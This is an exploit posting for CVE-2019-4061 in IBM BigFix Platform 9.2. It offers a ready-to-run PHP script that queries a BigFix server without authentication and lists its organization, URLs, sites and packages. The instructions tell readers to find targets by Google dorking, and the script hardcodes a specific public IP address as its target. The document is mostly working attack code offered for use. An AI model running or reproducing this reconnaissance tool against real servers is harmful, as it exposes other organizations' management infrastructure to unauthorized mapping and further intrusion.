=============================================================================================================================================
| # Title     : IBM BigFix Platform 9.2 gather information Vulnerability                                                                    |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://bigfix.com/                                                                                                         |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The code explores the IBM BigFix server via HTTP queries using cURL. 
   
   (linked: https://packetstorm.news/files/id/180698/ Linked CVE numbers: CVE-2019-4061),
	
[+] save code as poc.php.

[+] Set Target : line  68 

[+] USage : php poc.php 

[+] PayLoad :

<?php

class IBM_BigFix_Enum
{
    private $targetUri;
    private $port;
    private $ssl;

    public function __construct($targetUri, $port = 52311, $ssl = true)
    {
        $this->targetUri = rtrim($targetUri, '/');
        $this->port = $port;
        $this->ssl = $ssl;
    }

    private function sendRequest($uri)
    {
        $url = ($this->ssl ? 'https://' : 'http://') . $this->targetUri . ":$this->port" . '/' . ltrim($uri, '/');
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    public function getMasthead()
    {
        $response = $this->sendRequest('masthead/masthead.axfm');
        if ($response && preg_match('/Organization: (.*)./', $response, $matches)) {
            echo "Organization: " . htmlspecialchars($matches[1]) . "\n";
        }
        if ($response && preg_match_all('/URL: (.*)./', $response, $matches)) {
            foreach ($matches[1] as $url) {
                echo "URL: " . htmlspecialchars($url) . "\n";
            }
        }
    }

    public function getSites()
    {
        $response = $this->sendRequest('cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands');
        if ($response && preg_match_all('/: ([^ ]+)/', $response, $matches)) {
            echo "Sites:\n";
            foreach ($matches[1] as $site) {
                echo "- " . htmlspecialchars($site) . "\n";
            }
        }
    }

    public function getPackages()
    {
        $response = $this->sendRequest('cgi-bin/bfenterprise/BESMirrorRequest.exe');
        if (!$response) {
            return;
        }

        echo "Packages:\n";
        if (preg_match_all('/url: (.*)/', $response, $matches)) {
            foreach ($matches[1] as $url) {
                echo "- " . htmlspecialchars($url) . "\n";
            }
        }
    }
}

// تنفيذ الكود
$bigFix = new IBM_BigFix_Enum('153.143.185.78');
$bigFix->getMasthead();
$bigFix->getSites();


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================